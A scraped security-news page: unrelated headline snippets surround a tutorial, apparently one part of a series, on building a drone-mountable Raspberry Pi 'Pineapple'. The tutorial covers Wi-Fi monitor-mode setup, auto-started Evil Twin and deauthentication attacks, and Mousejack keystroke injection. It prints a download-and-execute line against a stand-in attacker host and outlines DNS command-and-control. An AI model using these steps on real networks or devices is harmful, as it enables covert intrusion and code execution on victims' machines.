Scammers are abusing Microsoft Teams invitations to send fake billing notices, with 12,866 emails reaching around 6,135 users in a phone-based phishing campaign.

Cybersecurity researchers have discovered an ongoing campaign that's targeting Indian users with a multi-stage backdoor as part of a suspected cyber espionage campaign. The activity, per the eSentire Threat Response Unit (TRU), involves using phishing emails impersonating the Income Tax Department of India to trick victims into downloading a malicious archive, ultimately granting the threat

Welcome back, aspiring drone cyberwarriors! 

We continue our series of articles on Drone Hacking. In previous parts, we discussed drones as platforms and delivery mechanisms. Now it is time to take a closer look at the attacking component itself. This is where many people misunderstand the threat. For a hacker, a drone is not a weapon. A drone is merely transportation. It is the deliverer, not the attacker. In reality, almost all wireless attacks are carried out using a small, miniature device attached to the drone. This device performs the scanning, interception, impersonation, and exploitation of wireless protocols. One such device is a Pineapple built on a Raspberry Pi, which we will show today how to build. Its compact size allows it to be mounted on almost any drone, because it is lightweight and consumes little power. In fact, this same device does not even require a drone at all. It can be used independently. A hacker can quietly plant such a device near a target building, drop it into grass or bushes near an office, or hide it in everyday infrastructure. OTW has already explained how it was done in Mr.Robot

Many readers will remember the scene from the TV series where a Raspberry Pi is hidden inside a thermostat. That scene is not science fiction. It is a very realistic example of how such hardware can be deployed. In a separate article we will show you how our device operates when used independently without a drone.

Raspberry Pi Pineapple

Now, let’s talk about our new device. The total weight of the homemade Pineapple together with its battery ranges from only 17 to 43 grams, depending on the battery used. Modern consumer drones are designed with power reserves to compensate for wind and to carry accessories such as action cameras. As a result, they can typically lift between one-third and one-half of their own weight without a noticeable loss of flight performance.

This means that almost any drone, including very small selfie drones, can easily handle such a payload. This is a significant advantage compared to the bulky, ready-made Pineapple device from Hak5. Not every drone can lift that commercial unit. From an attacker’s perspective, speed is often the most important requirement when planning drone-based attacks. Fast deployment, short exposure time, and rapid exit are key.

In a separate article dedicated specifically to the Pineapple platform, we will examine static attacks on wireless networks. These are attacks where long-term presence at a fixed point is required. When a drone is involved, however, it makes far more sense to perform dynamic attacks. Wireless attacks are highly dependent on circumstances, such as whether client devices are present and active at a given moment. Because of this, the duration of exposure directly affects the probability of success. From a practical standpoint, the choice is obvious. If the device is lost, the hacker simply purchases another Raspberry Pi and flashes a prepared image onto a memory card. There is no need to buy a costly ready-made solution and wait for delivery. 

The Raspberry Pi, like most other single-board computers, can operate at reduced voltage, which makes it possible to use popular compact 3.7 V batteries. Such batteries are cheaper and smaller than power banks and can be easily purchased online. They are charged with 5 V, which can be taken from any USB port. However, despite the fact that the Raspberry Pi can operate at 3.3 V, external USB devices do not receive the 5 V promised by the USB standard in this case. Therefore, if such external USB devices are planned to be used, the voltage must still be raised to 5 V using the popular DC-DC MT3608 module (the blue module on top).

A 3.7 V battery, located at the bottom, supplies 5 V to GPIO pins 2 and 9 through the MT3608 DC-DC boost converter. An external Micro-USB connector is also soldered to the converter for convenient battery charging, along with a power toggle switch for battery supply. Nevertheless, the Raspberry Pi has two native USB ports, which means there is always the option to use a regular power bank. The wiring diagram for LEDs, switches, and power connections is shown below.

Using a display can be wasteful in terms of battery consumption, so it is better to use three LEDs to indicate the process. To automatically start predefined scenarios, six jumper positions are used. Their software handling is described below. Two voltage supply points are also provided: 5 volts and 3.3 volts. Pins 8 and 10 serve an additional purpose. Using a UART adapter, an operator can always open a shell on the Pineapple device for debugging or control.

Now we arrive at one of the most important components. It’s the Wi-Fi adapter. Monitor mode is not available out of the box on the Raspberry Pi’s built-in Wi-Fi card. It can be enabled using special firmware, but this requires building and installing a new kernel.

Pi > wget -O re4son-kernel_current.tar.xz https://re4son-kernel.com/download/re4son-kernel-current/
Pi > tar -xJf re4son-kernel_current.tar.xz
Pi > cd re4son-kernel_4*
Pi > sudo ./install.sh

After installation, an additional firmware file for the Wi-Fi chip appears. This file enables monitor mode functionality.

Pi > md5sum /lib/firmware/brcm/brcmfmac43430-sdio.*

bae7f1ba1b64cb19bb0c5433a3940405 /lib/firmware/brcm/brcmfmac43430-sdio.bin.monitor
54f6af2776997cb1ee06edf2b93ab815 /lib/firmware/brcm/brcmfmac43430-sdio.bin.original

To switch between firmware versions, the driver can be reloaded and the firmware file renamed.

Pi > iw phy0 interface add mon0 type monitor
Pi > ifconfig mon0 up
Pi > airodump-ng mon0

At this point, the device can autonomously perform many of the most common Wi-Fi attacks. If necessary, external Wi-Fi adapters and directional antennas can be used, although this reduces stealth and increases detectability. 

Because this configuration may shut down improperly when the battery is depleted, it is recommended to disable disk caching to prevent data loss.

/etc/fstab
PARTUUID=067e19d7-02 / ext4 defaults,noatime,sync 0 1

In some scenarios, the hacker needs attacks to start immediately upon power-up. This is achieved using GPIO jumpers. Jumper positions are read in software using the following script.

/etc/local/bin/jmp

#!/bin/bash
exit $(raspi-gpio get $1 | awk '{print $3}' | cut -d '=' -f )

By setting a jumper position before powering on the device, the hacker selects which attack scenario to launch, such as an Evil Twin or mass deauthentication and handshake capture. The logic for this selection is implemented in the startup script.

A startup.sh file is created in /home/pi

You can find this script on our GitHub

Then you need to add the following entry to /etc/rc.local:

/bin/bash /home/pi/startup.sh &

This will launch the script automatically. Attack progress and results are stored on the device’s memory card. Filenames reflect the attack type, date, and time. With the platform established, we now move on to the first most critical attacks that can be carried out using a drone.

Mousejack

There is a widespread vulnerability that has persisted for decades in hundreds of thousands of wireless mice and keyboards. It gives you a remote code execution in one to two seconds. Quite a cinematic scene. This vulnerability is known as Mousejack. An attack on wireless HID devices is perhaps the most visually striking and dangerous attack possible. With minimal effort and no user interaction, a hacker can remotely send arbitrary keystrokes. This means arbitrary code execution. No password guessing. No social engineering. Instant RCE. Below is the part of our startup.sh code that starts this attack.

The attack is performed using a CrazyRadio PA device in combination with a single-board computer such as a Raspberry Pi or a Pineapple. If the CrazyRadio PA dongle is inserted into the Pineapple, the attack can be launched automatically at startup, once you add mousejack.sh to the mousejack directory. We have it here. You will also need to install jackit, which you can find here

Because we don’t know the addresses of target devices, we attack everything detected in the radio spectrum. This is why the –autopwn flag is used. Combined with a Pineapple, CrazyRadio becomes an extremely dangerous tool.

A drone carrying such a device can breach the perimeter of almost any organization. While flying, it attacks all vulnerable devices within range. Mousejack exploitation is similar to BadUSB-HID attacks. Here we encounter the same problems when typing commands: when using keystrokes, we have to guess the keyboard layout. Also, when using ALT codes to type commands (possible only on Windows), we have to guess the state of the Num Lock key. In both cases, to be reliable, we have to send the keystrokes twice, changing either the layout or the Num Lock state. But in the case of ALT codes, three to four times more keystrokes are required. And if there is no difference in outcome, why transmit more? It is more rational here to use the simple method of sending direct key presses rather than their codes. That’s why ducky.txt is used

Find it and place it in /home/pi/mousejack/. Depending on your language preferences, you might need to modify the file.

Longer commands increase the chance of interference. A single dropped keystroke can break the exploit. On Unix-like systems, hackers often rely on short commands such as:

curl -L http://rce.attacker.tk/1.sh | bash

At this stage, success depends only on drone positioning and the presence of wireless mice within a radius of approximately 10-15 meters. This attack looks exactly like it does in movies. Imagine working in a secure building, far from checkpoints, when a drone briefly appears outside a window. In a single second, malicious code is executed on your computer. You may never associate that moment with the compromise.

Wireless mice and keyboards are especially common among IT staff and executives, making such attacks disproportionately valuable. Once a single internal machine is compromised, the perimeter is breached.

Even when direct internet access is blocked, DNS-based exfiltration often remains possible. DNS can be used to download payloads and maintain command-and-control channels. Implementing the download of a malicious program over DNS can be done using basic tools of any operating system. For example, on Windows, the most portable method is a VBS script written in a full-fledged interpreted programming language. However, the length of the command entered into the “Run” window is limited, and to type a VBS script that downloads a remote administration tool over DNS, the hacker will need at least three commands. For this you will need a file that you can find here

When these commands are executed, three DNS callbacks should arrive at the hacker’s server, indicating that the commands were entered successfully.

Summary

This is only our first example that demonstrates how easily organizations can be compromised if you find the right computer. If you plan to use it, do it responsibly. Despite being known since 2016, Mousejack remains widespread and underestimated. Because it is a hardware flaw, it persists for years. People replace phones frequently, but they rarely replace their mice. 

In Part 4 you will see more of these attacks and the needed scripts for them.

For those of you getting started with Software-Defined Radio (SDR) or looking to advance your SDR hacking skills, we offer a structured training program that guides you from the fundamentals of SDR all the way to advanced, real-world applications in cybersecurity and signals intelligence.

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers. The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio

The North Korean state-sponsored Lazarus hacking group has launched a sophisticated cyberespionage campaign targeting European defense contractors involved in uncrewed aerial vehicle (UAV) manufacturing. The attacks appear directly linked to North Korea’s efforts to accelerate its domestic drone production capabilities through industrial espionage. The targeted organizations include a metal engineering firm, an aircraft component manufacturer, […]

The post Lazarus Hackers Target European Drone Manufacturers in Active Campaign appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A proof-of-concept exploit for CVE-2026-24061, a critical remote code execution vulnerability in the GNU Inetutils telnetd, has surfaced, with security researchers warning that over 800,000 vulnerable instances remain publicly accessible on the internet. The vulnerability allows unauthenticated attackers to execute arbitrary commands on affected systems running vulnerable versions of the telnetd service. Vulnerability Overview CVE-2026-24061 […]

The post PoC Released for GNU InetUtils telnetd RCE as 800K+ Exposed Instances Remain Online appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A server-side vulnerability in Instagram that allegedly allowed completely unauthenticated access to private account posts. This raises concerns about Meta’s vulnerability disclosure handling and the effectiveness of compensatory controls protecting user privacy. Technical Overview According to the disclosure, the vulnerability existed in Instagram’s mobile web interface and required no authentication or follower relationship to exploit. […]

The post Instagram Investigates Reported Vulnerability Allowing Access to Private Content appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A dangerous new malware toolkit is being sold on Russian cybercrime forums that can redirect victims to fake websites while keeping the real domain name visible in their browser’s address bar. The toolkit, called Stanley, costs between $2,000 and $6,000 and comes with a guarantee that it will pass Google’s Chrome Web Store review process. […]

The post New Malware Toolkit Redirects Victims to Malicious Sites Without Changing the URL appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A dangerous new iteration of the “Contagious Interview” campaign that weaponizes Microsoft Visual Studio Code task files to distribute sophisticated malware targeting software developers. This campaign, which began over 100 days ago, has intensified dramatically in recent weeks with 17 malicious GitHub repositories identified across 11 distinct attack variants.  North Korean threat actors linked to […]

The post New DPRK Interview Campaign Uses Fake Fonts to Deliver Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Two critical 0-day vulnerabilities in NetSupport Manager that, when chained, allow unauthenticated remote code execution (RCE). The vulnerabilities were discovered during routine security assessments of operational technology (OT) environments and affect version 14.10.4.0 and earlier, with fixes implemented in version 14.12.0000 released on July 29th, 2025. The two vulnerabilities tracked as CVE-2025-34164 and CVE-2025-34165 reside […]

The post NetSupport Manager 0-Day Vulnerabilities Enable Remote Code Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Microsoft has released two critical out-of-band (OOB) security patches targeting widespread issues affecting Windows 11 users following January’s monthly security updates. The emergency patches, KB5078127 and KB5078132, address severe file system failures and application crashes that emerged after the January 13 security release. The primary culprit behind these issues is unexpected complications introduced by KB5073455 […]

The post Microsoft Issues KB5078127 OOB Patch After Reports of Outlook Freezing and File System Instability appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A sophisticated, multi-stage espionage campaign targeting Indian residents through phishing emails impersonating the Income Tax Department. The attack chain, tracked as the “SyncFuture Espionage Campaign,” weaponizes legitimate enterprise security software as its final payload, demonstrating how threat actors repurpose trusted commercial tools to establish persistent, undetectable access to victim systems.​ The campaign begins with targeted […]

The post SyncFuture Campaign Abuses Enterprise Security Tools to Deploy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A moderate out-of-bounds write vulnerability in Apache Hadoop’s HDFS native client that could allow attackers to trigger system crashes or cause data corruption in production environments.  The flaw, identified as CVE-2025-27821, affects the native HDFS client’s URI parser and has been assigned moderate severity by Apache. The vulnerability was discovered and reported by security researcher […]

The post Apache Hadoop Flaw Could Trigger System Crashes or Data Corruption appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

A new phishing campaign abusing the Vercel hosting platform has been active since at least November 2025 and is becoming increasingly sophisticated. The core trick is “inherited trust.” Attackers send short phishing emails with financial or business themes such as unpaid invoices, payment statements, or document reviews. The real hook is not the text, but […]

The post New Phishing Attack Exploits Vercel to Host and Deliver Remote Access Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

As users continue to assess the Under Armour data breach, WorldLeaks, the rebranded version of the Hunters International…

Hello aspiring Cyber Forensic Investigators. In our previous blogpost, you learnt in detail about Computer Forensics. In this article, you will learn about Bulk Extractor, a fast, automated forensic carving tool. Digital forensic investigations often require extracting useful information from massive amounts of data like disk images, memory dumps, captured network traffic and more. Manually […]

The post Beginners Guide to Bulk Extractor tool appeared first on Hackercool Magazine.

Another day, another fake CAPTCHA scam, but this one abuses Microsoft’s signed tools.

Security failures rarely arrive loudly. They slip in through trusted tools, half-fixed problems, and habits people stop questioning. This week’s recap shows that pattern clearly. Attackers are moving faster than defenses, mixing old tricks with new paths. “Patched” no longer means safe, and every day, software keeps becoming the entry point. What follows is a set of small but telling signals.

If there’s a constant in cybersecurity, it’s that adversaries are always innovating. The rise of offensive AI is transforming attack strategies and making them harder to detect. Google’s Threat Intelligence Group, recently reported on adversaries using Large Language Models (LLMs) to both conceal code and generate malicious scripts on the fly, letting malware shape-shift in real-time to evade

Linux running inside a PDF. An actual working operating system with a terminal where you can type commands. Open a PDF in Chrome. Wait 30 seconds. You now have a working Linux terminal. No installation, no software, just a 6MB file that boots an entire operating system.

A high school student named Allen built this, the same kid who previously crammed Doom into a PDF. Before that he made tools to bypass school software restrictions and exploits to boot Linux on locked-down Chromebooks.